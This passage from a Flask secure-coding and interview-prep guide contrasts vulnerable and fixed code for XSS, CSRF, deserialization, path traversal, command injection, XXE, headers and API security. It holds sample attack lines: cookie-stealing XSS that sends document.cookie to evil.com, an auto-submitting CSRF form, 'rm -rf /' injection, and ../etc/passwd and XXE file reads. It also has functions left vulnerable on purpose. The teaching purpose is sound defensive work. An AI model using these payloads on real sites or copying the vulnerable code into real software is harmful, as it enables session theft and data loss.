# ❌ VULNERABLE - Reflected XSS
@app.route('/search_bad')
def search_bad():
    """NEVER DO THIS - Directly rendering user input"""
    query = request.args.get('q', '')

    # VULNERABLE: User input rendered without escaping
    # Attack: /search?q=<script>alert('XSS')</script>
    html = f"<h1>Search results for: {query}</h1>"
    return html


# ❌ VULNERABLE - Stored XSS
@app.route('/comment_bad', methods=['POST'])
def comment_bad():
    """NEVER DO THIS - Storing and displaying unsanitized input"""
    comment = request.form.get('comment')

    # VULNERABLE: Stores malicious script in database
    # Attack: comment="<script>document.location='http://evil.com?cookie='+document.cookie</script>"
    db.save_comment(comment)  # Stores XSS payload

    # Later, when displaying comments (vulnerable):
    # return f"<div>{comment}</div>"  # Executes script


# ✅ SECURE - Auto-escaping with Jinja2
@app.route('/search_safe')
def search_safe():
    """Safe: Jinja2 auto-escapes by default"""
    query = request.args.get('q', '')

    # Jinja2 automatically escapes HTML
    template = """
    <h1>Search results for: {{ query }}</h1>
    """
    return render_template_string(template, query=query)


# ✅ SECURE - Manual escaping
@app.route('/search_escape')
def search_escape():
    """Safe: Explicitly escape user input"""
    query = request.args.get('q', '')

    # Escape HTML characters
    safe_query = escape(query)
    html = f"<h1>Search results for: {safe_query}</h1>"
    return html


# ✅ SECURE - Sanitizing HTML input (for rich text)
class HTMLSanitizer:
    """
    Sanitize HTML input when you need to allow some HTML

    Use case: Blog comments, rich text editors
    Strategy: Whitelist allowed tags and attributes
    """

    def __init__(self):
        # Allowed tags
        self.allowed_tags = [
            'p', 'br', 'strong', 'em', 'u', 'a', 'ul', 'ol', 'li',
            'h1', 'h2', 'h3', 'blockquote', 'code', 'pre'
        ]

        # Allowed attributes per tag
        self.allowed_attributes = {
            'a': ['href', 'title'],
            '*': ['class']  # Allow class on all tags
        }

    def sanitize(self, html_input: str) -> str:
        """
        Sanitize HTML using bleach library

        Bleach:
        - Whitelists allowed tags and attributes
        - Removes everything else
        - Escapes remaining content
        """
        clean_html = bleach.clean(
            html_input,
            tags=self.allowed_tags,
            attributes=self.allowed_attributes,
            strip=True  # Remove disallowed tags
        )

        # Linkify bare URLs and re-check the URLs of existing links
        clean_html = bleach.linkify(
            clean_html,
            callbacks=[self._validate_url]
        )

        return clean_html

    def _validate_url(self, attrs, new=False):
        """Validate that URLs are safe (no javascript:)"""
        # bleach passes attribute keys as (namespace, name) tuples
        href = attrs.get((None, 'href'), '')

        # Only allow http(s) and mailto; this also rejects javascript: URLs
        if not href.startswith(('http://', 'https://', 'mailto:')):
            return None  # Remove the link

        return attrs


@app.route('/comment_safe', methods=['POST'])
def comment_safe():
    """Safe: Sanitize HTML input"""
    comment = request.form.get('comment', '')

    sanitizer = HTMLSanitizer()
    safe_comment = sanitizer.sanitize(comment)

    # Store sanitized comment
    db.save_comment(safe_comment)
    return "Comment saved"


# Content Security Policy (CSP) header
@app.after_request
def add_security_headers(response):
    """
    Add security headers to mitigate XSS

    Content-Security-Policy:
    - Defines which sources the browser can load resources from
    - Blocks inline scripts (limits the impact of injected markup)
    """
    response.headers['Content-Security-Policy'] = (
        "default-src 'self'; "
        "script-src 'self' https://trusted-cdn.com; "
        "style-src 'self' 'unsafe-inline'; "
        "img-src 'self' data: https:; "
        "font-src 'self'; "
        "connect-src 'self'; "
        "frame-ancestors 'none'"
    )

    # Prevent MIME type sniffing
    response.headers['X-Content-Type-Options'] = 'nosniff'

    # Legacy header: modern browsers have removed the XSS auditor, and
    # OWASP recommends disabling it explicitly. CSP is the real defense.
    response.headers['X-XSS-Protection'] = '0'

    return response


# Example attacks and defenses
print("=== XSS Attack Examples ===")
print("Reflected XSS: /search?q=<script>alert('XSS')</script>")
print("Stored XSS: <script>fetch('http://evil.com?cookie='+document.cookie)</script>")
print("DOM XSS: document.write(location.hash)")
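
What escaping actually does to a payload is easy to inspect without a web framework. The sketch below uses `html.escape` from the standard library as a stand-in for the template engine's auto-escaping; the `render_search_heading` helper is a hypothetical name.

```python
import html


def render_search_heading(query: str) -> str:
    """Escape user input before placing it inside HTML element content."""
    return f"<h1>Search results for: {html.escape(query, quote=True)}</h1>"


payload = "<script>alert('XSS')</script>"
print(render_search_heading(payload))
# <h1>Search results for: &lt;script&gt;alert(&#x27;XSS&#x27;)&lt;/script&gt;</h1>
```

The browser displays the escaped text as literal characters instead of parsing it as a script element. Escaping is context-specific: this form is suitable for element content and quoted attribute values, not for placing input inside a script block or a URL.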

5.3 Cross-Site Request Forgery (CSRF)

Cross-Site Request Forgery (CSRF) (A8 in the OWASP Top 10 2013; no longer a standalone category since 2017)

Risk: Attackers trick authenticated users into performing unwanted actions (delete account, transfer money, change email).

from flask import Flask, request, session, render_template_string
import secrets
import hmac
import hashlib

app = Flask(__name__)
app.secret_key = secrets.token_hex(32)

# ❌ VULNERABLE - No CSRF protection
@app.route('/transfer_bad', methods=['POST'])
def transfer_money_bad():
    """
    VULNERABLE: No CSRF token

    Attack scenario:
    1. User logs into bank.com
    2. User visits evil.com (attacker's site)
    3. evil.com has hidden form:
       <form action="https://bank.com/transfer" method="POST">
         <input name="to" value="attacker_account">
         <input name="amount" value="1000">
       </form>
       <script>document.forms[0].submit()</script>
    4. Form submits with user's cookies (authenticated session)
    5. Money transferred without user's knowledge
    """
    to_account = request.form.get('to')
    amount = request.form.get('amount')

    # No CSRF check - processes any POST request
    process_transfer(to_account, amount)
    return "Transfer complete"


# ✅ SECURE - CSRF token protection
class CSRFProtection:
    """
    CSRF protection using synchronizer tokens

    How it works:
    1. Generate random token on form load
    2. Store token in session (server-side)
    3. Include token in form as hidden field
    4. Verify token on form submission
    5. Reject if token missing or doesn't match

    Why it works:
    - Attacker can't read token (same-origin policy)
    - Attacker can't guess token (cryptographically random)
    - Token tied to user's session
    """

    @staticmethod
    def generate_token() -> str:
        """Generate CSRF token"""
        token = secrets.token_hex(32)
        session['csrf_token'] = token
        return token

    @staticmethod
    def validate_token(token: str) -> bool:
        """Validate CSRF token"""
        session_token = session.get('csrf_token')

        if not session_token or not token:
            return False

        # Use constant-time comparison to prevent timing attacks
        return hmac.compare_digest(session_token, token)


@app.route('/transfer_form')
def transfer_form():
    """Display form with CSRF token"""
    csrf_token = CSRFProtection.generate_token()

    template = """
    <form method="POST" action="/transfer">
        <input type="hidden" name="csrf_token" value="{{ csrf_token }}">
        <input type="text" name="to" placeholder="To account">
        <input type="number" name="amount" placeholder="Amount">
        <button type="submit">Transfer</button>
    </form>
    """
    return render_template_string(template, csrf_token=csrf_token)


@app.route('/transfer', methods=['POST'])
def transfer_money():
    """Process transfer with CSRF protection"""
    csrf_token = request.form.get('csrf_token')

    # Validate CSRF token
    if not CSRFProtection.validate_token(csrf_token):
        return "CSRF token validation failed", 403

    to_account = request.form.get('to')
    amount = request.form.get('amount')

    process_transfer(to_account, amount)
    return "Transfer complete"


# ✅ SECURE - Double Submit Cookie pattern
class DoubleSubmitCSRF:
    """
    Alternative CSRF protection: Double Submit Cookie

    How it works:
    1. Set CSRF token in cookie
    2. Include same token in form/header
    3. Verify cookie value == form/header value

    Advantage: No server-side storage needed (stateless)
    Works for: APIs, distributed systems
    """

    @staticmethod
    def set_csrf_cookie(response):
        """Set CSRF token in cookie"""
        token = secrets.token_hex(32)
        response.set_cookie(
            'csrf_token',
            token,
            httponly=False,  # JavaScript needs to read it
            samesite='Strict',
            secure=True  # HTTPS only
        )
        return token

    @staticmethod
    def validate_token(cookie_token: str, form_token: str) -> bool:
        """Validate that cookie and form tokens match"""
        if not cookie_token or not form_token:
            return False
        return hmac.compare_digest(cookie_token, form_token)


# ✅ SECURE - SameSite cookie attribute
@app.route('/set_session')
def set_session():
    """
    Use SameSite cookie attribute for CSRF protection

    SameSite options:
    - Strict: Cookie not sent on cross-site requests (best security)
    - Lax: Cookie sent on top-level navigation (GET only)
    - None: Cookie sent on all requests (requires Secure flag)

    Modern browsers support SameSite, provides automatic CSRF protection
    """
    from flask import make_response

    response = make_response("Session set")
    response.set_cookie(
        'session_id',
        'abc123',
        httponly=True,     # Prevents JavaScript access
        secure=True,       # HTTPS only
        samesite='Strict'  # CSRF protection
    )
    return response


# Flask-WTF integration (recommended for Flask)
from flask_wtf import FlaskForm
from flask_wtf.csrf import CSRFProtect
from wtforms import StringField, IntegerField
from wtforms.validators import DataRequired

csrf = CSRFProtect(app)

class TransferForm(FlaskForm):
    """Flask-WTF automatically handles CSRF tokens"""
    to_account = StringField('To', validators=[DataRequired()])
    amount = IntegerField('Amount', validators=[DataRequired()])


@app.route('/transfer_wtf', methods=['GET', 'POST'])
def transfer_wtf():
    """Using Flask-WTF (handles CSRF automatically)"""
    form = TransferForm()

    if form.validate_on_submit():
        # CSRF token automatically validated
        to_account = form.to_account.data
        amount = form.amount.data
        process_transfer(to_account, amount)
        return "Transfer complete"

    return render_template_string("""
    <form method="POST">
        {{ form.hidden_tag() }}
        {{ form.to_account }}
        {{ form.amount }}
        <button type="submit">Transfer</button>
    </form>
    """, form=form)

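The Double Submit Cookie pattern above only checks that the cookie and form values match. A commonly recommended hardening is to sign the token and bind it to the user's session, so that an attacker who can plant a cookie still cannot forge a valid pair. The following is a minimal standard-library sketch of that idea, not the guide's own implementation; `SERVER_SECRET`, `issue_csrf_token`, and `verify_csrf_token` are hypothetical names introduced for illustration.

```python
import hashlib
import hmac
import secrets

# Hypothetical server-side secret; in practice, load it from configuration.
SERVER_SECRET = secrets.token_bytes(32)


def _sign(session_id: str, random_part: str) -> str:
    """HMAC-SHA256 over the session ID and the random part of the token."""
    message = f"{session_id}:{random_part}".encode()
    return hmac.new(SERVER_SECRET, message, hashlib.sha256).hexdigest()


def issue_csrf_token(session_id: str) -> str:
    """Return 'random.signature'; the signature binds the token to the session."""
    random_part = secrets.token_hex(16)
    return f"{random_part}.{_sign(session_id, random_part)}"


def verify_csrf_token(session_id: str, cookie_token: str, form_token: str) -> bool:
    """Check that both copies match and that the signature fits this session."""
    if not cookie_token or not form_token:
        return False
    # Compare as bytes so non-ASCII input cannot raise a TypeError.
    if not hmac.compare_digest(cookie_token.encode(), form_token.encode()):
        return False
    random_part, separator, signature = form_token.partition(".")
    if not separator:
        return False
    expected = _sign(session_id, random_part)
    return hmac.compare_digest(signature.encode(), expected.encode())
```

A token issued for one session fails verification when presented with a different session ID, which is the property the plain double-submit check lacks.
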
5.4 Other Critical Vulnerabilities

# ✅ Insecure Deserialization Prevention
import json
import pickle

class SecureDeserialization:
    """
    Insecure deserialization can lead to Remote Code Execution (RCE)

    NEVER use pickle with untrusted data
    Use JSON instead (safe, only basic types)
    """

    @staticmethod
    def bad_deserialize(data: bytes):
        """❌ DANGEROUS: pickle can execute arbitrary code"""
        return pickle.loads(data)  # RCE vulnerability!

    @staticmethod
    def safe_deserialize(data: str) -> dict:
        """✅ SAFE: JSON only deserializes basic types"""
        return json.loads(data)


# ✅ Path Traversal Prevention
import os
from pathlib import Path

class SecureFileAccess:
    """
    Path traversal: Attacker accesses files outside intended directory

    Attack: filename="../../../etc/passwd"
    """

    def __init__(self, upload_dir: str):
        self.upload_dir = Path(upload_dir).resolve()

    def get_file_bad(self, filename: str):
        """❌ VULNERABLE: No path validation"""
        # Attack: filename="../../etc/passwd"
        filepath = os.path.join(self.upload_dir, filename)
        return open(filepath, 'r').read()

    def get_file_safe(self, filename: str):
        """✅ SAFE: Validate path stays in upload directory"""
        # Resolve absolute path
        requested_path = (self.upload_dir / filename).resolve()

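        # Check that the path is within the upload directory.
        # Compare path components, not string prefixes: a prefix check
        # would also accept sibling directories such as "/uploads_evil".
        try:
            requested_path.relative_to(self.upload_dir)
        except ValueError:
            raise ValueError("Invalid file path (path traversal attempt)") from None

        # Check that the target exists and is a regular file
        if not requested_path.is_file():
            raise FileNotFoundError("File not found")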

        return requested_path.read_text()


# ✅ Command Injection Prevention
import os
import subprocess

class SecureCommandExecution:
    """
    Command injection: Attacker executes arbitrary system commands

    Attack: filename="file.txt; rm -rf /"
    """

    def run_command_bad(self, filename: str):
        """❌ DANGEROUS: Shell injection"""
        # Attack: filename="file.txt; rm -rf /"
        os.system(f"cat {filename}")  # Executes arbitrary commands!

    def run_command_safe(self, filename: str):
        """✅ SAFE: Use subprocess with list (no shell)"""
        # subprocess with a list doesn't invoke a shell, so shell
        # metacharacters such as ";" reach cat as literal text.
        # The "--" stops a filename starting with "-" being read as an option.
        result = subprocess.run(
            ['cat', '--', filename],
            capture_output=True,
            text=True,
            shell=False  # Critical: don't use shell
        )
        return result.stdout

    def run_command_with_validation(self, filename: str):
        """✅ SAFER: Validate input before running the command"""
        # Allowlist: letters, digits, underscores, and dots only
        if not filename.replace('_', '').replace('.', '').isalnum():
            raise ValueError("Invalid filename")

        # Do not wrap the argument in shlex.quote here. Quoting is only for
        # command strings passed through a shell; with a list and shell=False
        # the added quotes would become part of the filename.
        result = subprocess.run(
            ['cat', '--', filename],
            capture_output=True,
            text=True,
            shell=False
        )
        return result.stdout


# ✅ XML External Entity (XXE) Prevention
import defusedxml.ElementTree as ET

class SecureXMLParsing:
    """
    XXE attack: Attacker uses XML external entities to read files

    Attack:
    <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
    <foo>&xxe;</foo>
    """

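    def parse_xml_bad(self, xml_string: str):
        """❌ RISKY: Standard-library parsers are not hardened for untrusted XML"""
        # ElementTree does not expand external entities itself, but the xml
        # modules can still be exposed to entity-expansion (DoS) attacks on
        # older Expat versions, and other parsers may resolve external entities.
        import xml.etree.ElementTree as StandardET
        return StandardET.fromstring(xml_string)  # Not safe for untrusted input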

    def parse_xml_safe(self, xml_string: str):
        """✅ SAFE: Use defusedxml library"""
        # defusedxml disables external entity processing
        return ET.fromstring(xml_string)
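
The path-traversal defence in SecureFileAccess above depends on how "inside the upload directory" is tested. As a small illustration, the sketch below contrasts a string-prefix check with a component-wise check using `Path.relative_to`. The helper names `is_inside` and `is_inside_prefix` and the directory names are hypothetical, and everything runs in a temporary directory.

```python
import tempfile
from pathlib import Path


def is_inside(base_dir: Path, filename: str) -> bool:
    """Return True if base_dir / filename resolves to a path inside base_dir."""
    base = base_dir.resolve()
    candidate = (base / filename).resolve()
    try:
        candidate.relative_to(base)  # raises ValueError if not under base
    except ValueError:
        return False
    return True


def is_inside_prefix(base_dir: Path, filename: str) -> bool:
    """String-prefix version, shown only to illustrate its weakness."""
    base = base_dir.resolve()
    candidate = (base / filename).resolve()
    return str(candidate).startswith(str(base))


with tempfile.TemporaryDirectory() as tmp:
    uploads = Path(tmp) / "uploads"
    uploads.mkdir()
    (Path(tmp) / "uploads_private").mkdir()  # sibling sharing the same prefix

    normal_ok = is_inside(uploads, "report.txt")
    parent_blocked = not is_inside(uploads, "../../etc/passwd")
    absolute_blocked = not is_inside(uploads, "/etc/passwd")
    sibling_blocked = not is_inside(uploads, "../uploads_private/secret.txt")
    # The prefix check wrongly accepts the sibling directory.
    prefix_fooled = is_inside_prefix(uploads, "../uploads_private/secret.txt")
```

The sibling-directory case is the one a prefix comparison gets wrong, because the string "/…/uploads_private" starts with "/…/uploads".
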

6. Security Headers

from flask import Flask, make_response

class SecurityHeaders:
    """
    Essential HTTP security headers

    These headers protect against various attacks
    Should be set on all responses
    """

    @staticmethod
    def add_security_headers(response):
        """Add all security headers to response"""

        # Prevent clickjacking attacks
        response.headers['X-Frame-Options'] = 'DENY'

        # Prevent MIME type sniffing
        response.headers['X-Content-Type-Options'] = 'nosniff'

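        # Disable the legacy browser XSS filter. Modern browsers have removed
        # it, and it could itself introduce vulnerabilities; rely on CSP instead.
        response.headers['X-XSS-Protection'] = '0'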

        # Content Security Policy (CSP)
        # Prevents XSS by controlling resource loading
        response.headers['Content-Security-Policy'] = (
            "default-src 'self'; "
            "script-src 'self' https://trusted-cdn.com; "
            "style-src 'self' 'unsafe-inline'; "
            "img-src 'self' data: https:; "
            "font-src 'self'; "
            "connect-src 'self'; "
            "frame-ancestors 'none'; "
            "base-uri 'self'; "
            "form-action 'self'"
        )

        # HTTP Strict Transport Security (HSTS)
        # Forces HTTPS for future requests
        response.headers['Strict-Transport-Security'] = (
            'max-age=31536000; includeSubDomains; preload'
        )

        # Referrer Policy
        # Controls how much referrer information is sent
        response.headers['Referrer-Policy'] = 'strict-origin-when-cross-origin'

        # Permissions Policy (formerly Feature Policy)
        # Disable dangerous features
        response.headers['Permissions-Policy'] = (
            'geolocation=(), '
            'microphone=(), '
            'camera=(), '
            'payment=()'
        )

        return response


# Apply to Flask app
app = Flask(__name__)

@app.after_request
def apply_security_headers(response):
    """Apply security headers to all responses"""
    return SecurityHeaders.add_security_headers(response)
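
The Content-Security-Policy above allows 'unsafe-inline' for styles, which weakens the policy. One common alternative is a per-response nonce: the server generates a fresh random value, places it in the header, and adds the same value as a `nonce` attribute on the inline tags it trusts. The sketch below only builds the header value; `new_nonce` and `build_csp` are hypothetical helper names, and the directive list is a shortened assumption rather than a recommended production policy.

```python
import secrets


def new_nonce() -> str:
    """Generate a fresh, unguessable nonce for one response."""
    return secrets.token_urlsafe(16)


def build_csp(nonce: str) -> str:
    """Build a CSP header value that trusts only same-origin and nonce-tagged code."""
    directives = [
        "default-src 'self'",
        f"script-src 'self' 'nonce-{nonce}'",
        f"style-src 'self' 'nonce-{nonce}'",
        "frame-ancestors 'none'",
        "base-uri 'self'",
        "form-action 'self'",
    ]
    return "; ".join(directives)


# Example: one nonce per response, reused in the header and in the template.
nonce = new_nonce()
header_value = build_csp(nonce)
```

The nonce must be regenerated for every response; a reused or predictable nonce gives an attacker a value to copy into injected markup.
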

7. API Security Best Practices

from functools import wraps
from flask import request, jsonify
import time

class APISecurityManager:
    """
    API security best practices
    """

    def __init__(self):
        self.rate_limiter = {}  # In production, use Redis
        self.api_keys = {}      # In production, use database

    def require_api_key(self, f):
        """
        API Key authentication

        Usage: @require_api_key
        Header: X-API-Key: your-api-key
        """
        @wraps(f)
        def decorated(*args, **kwargs):
            api_key = request.headers.get('X-API-Key')

            if not api_key:
                return jsonify({'error': 'API key required'}), 401

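            # Validate API key. Note: this dict lookup is not a constant-time
            # comparison; in production, store only hashes of keys and compare
            # digests with hmac.compare_digest.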
            if api_key not in self.api_keys:
                return jsonify({'error': 'Invalid API key'}), 401

            # Add API key info to request context
            request.api_key_info = self.api_keys[api_key]

            return f(*args, **kwargs)

        return decorated

    def rate_limit(self, max_requests: int, window_seconds: int):
        """
        Rate limiting decorator

        Usage: @rate_limit(max_requests=100, window_seconds=60)

        Limits abuse and brute-force attempts (not a complete DDoS defense)
        """
        def decorator(f):
            @wraps(f)
            def decorated(*args, **kwargs):
                # Get client identifier (API key, IP, user ID)
                client_id = request.headers.get('X-API-Key') or request.remote_addr

                current_time = time.time()
                key = f"{client_id}:{f.__name__}"

                # Get request history
                if key not in self.rate_limiter:
                    self.rate_limiter[key] = []

                # Remove old requests outside window
                self.rate_limiter[key] = [
                    t for t in self.rate_limiter[key]
                    if current_time - t < window_seconds
                ]

                # Check if limit exceeded
                if len(self.rate_limiter[key]) >= max_requests:
                    return jsonify({
                        'error': 'Rate limit exceeded',
                        'retry_after': window_seconds
                    }), 429

                # Record this request
                self.rate_limiter[key].append(current_time)

                return f(*args, **kwargs)

            return decorated
        return decorator

    def validate_content_type(self, expected_type: str):
        """
        Validate Content-Type header

        Prevents attacks that exploit content type confusion
        """
        def decorator(f):
            @wraps(f)
            def decorated(*args, **kwargs):
                content_type = request.headers.get('Content-Type', '')

                if not content_type.startswith(expected_type):
                    return jsonify({
                        'error': f'Content-Type must be {expected_type}'
                    }), 415

                return f(*args, **kwargs)

            return decorated
        return decorator


# Usage example
security = APISecurityManager()

# POST only: the Content-Type check below applies to requests that carry a body
@app.route('/api/data', methods=['POST'])
@security.require_api_key
@security.rate_limit(max_requests=100, window_seconds=60)
@security.validate_content_type('application/json')
def get_data():
    """Secured API endpoint"""
    return jsonify({'data': 'sensitive information'})


# CORS Security
from flask_cors import CORS

# ❌ BAD: Allow all origins (commented out so it is never applied)
# CORS(app, origins="*")  # Insecure!

# ✅ GOOD: Whitelist specific origins
CORS(app, origins=[
    "https://trusted-domain.com",
    "https://app.trusted-domain.com"
])
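
For the API key check earlier in this section, one way to avoid keeping raw keys on the server is to store only a digest of each key and compare digests in constant time. The sketch below assumes keys are long random strings (so a plain SHA-256 digest is adequate, unlike for passwords); `ApiKeyStore` and its methods are hypothetical names, and the in-memory dict stands in for a database.

```python
import hashlib
import hmac
import secrets
from typing import Optional


class ApiKeyStore:
    """Hypothetical in-memory store that keeps only SHA-256 digests of API keys."""

    def __init__(self) -> None:
        self._records = {}  # digest (hex str) -> key metadata

    @staticmethod
    def _digest(api_key: str) -> str:
        return hashlib.sha256(api_key.encode()).hexdigest()

    def create_key(self, owner: str) -> str:
        """Create a key, store its digest, and return the raw key once."""
        api_key = secrets.token_urlsafe(32)
        self._records[self._digest(api_key)] = {"owner": owner}
        return api_key

    def lookup(self, presented_key: str) -> Optional[dict]:
        """Return metadata for a valid key, or None."""
        presented_digest = self._digest(presented_key)
        # Linear scan with a constant-time comparison per entry; fine for a
        # sketch, but a real store would index by digest.
        for stored_digest, info in self._records.items():
            if hmac.compare_digest(stored_digest, presented_digest):
                return info
        return None
```

With this layout a leaked key table exposes digests rather than usable keys, and the raw key is only ever shown to the client at creation time.
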

8. Interview Tips

Key Security Concepts to Know:
Common Interview Questions:
  1. "How would you implement authentication for a REST API?" → JWT with refresh tokens
  2. "Explain OAuth 2.0 Authorization Code flow" → Know all 6 steps
  3. "How do you prevent SQL injection?" → Parameterized queries
  4. "What's the difference between authentication and authorization?" → Identity vs permissions
  5. "How do JWTs work? What are the parts?" → Header.Payload.Signature
  6. "How do you securely store passwords?" → bcrypt/Argon2 with salt
  7. "What is CSRF and how do you prevent it?" → Tokens or SameSite cookies
  8. "Explain XSS and mitigation strategies" → Escape output, CSP, sanitize input
Security Red Flags in Interviews:
Production Security Checklist:
  1. ✅ Use HTTPS everywhere (enforce with HSTS)
  2. ✅ Implement proper authentication (OAuth 2.0 / OIDC)
  3. ✅ Hash passwords with bcrypt/Argon2 (never plaintext)
  4. ✅ Use parameterized queries (prevent SQL injection)
  5. ✅ Escape output / sanitize input (prevent XSS)
  6. ✅ Implement CSRF protection (tokens or SameSite)
  7. ✅ Set security headers (CSP, HSTS, X-Frame-Options)
  8. ✅ Rate limit APIs (prevent abuse)
  9. ✅ Validate all input (never trust client)
  10. ✅ Keep dependencies updated (patch vulnerabilities)
  11. ✅ Log security events (audit trail)
  12. ✅ Use principle of least privilege (minimal permissions)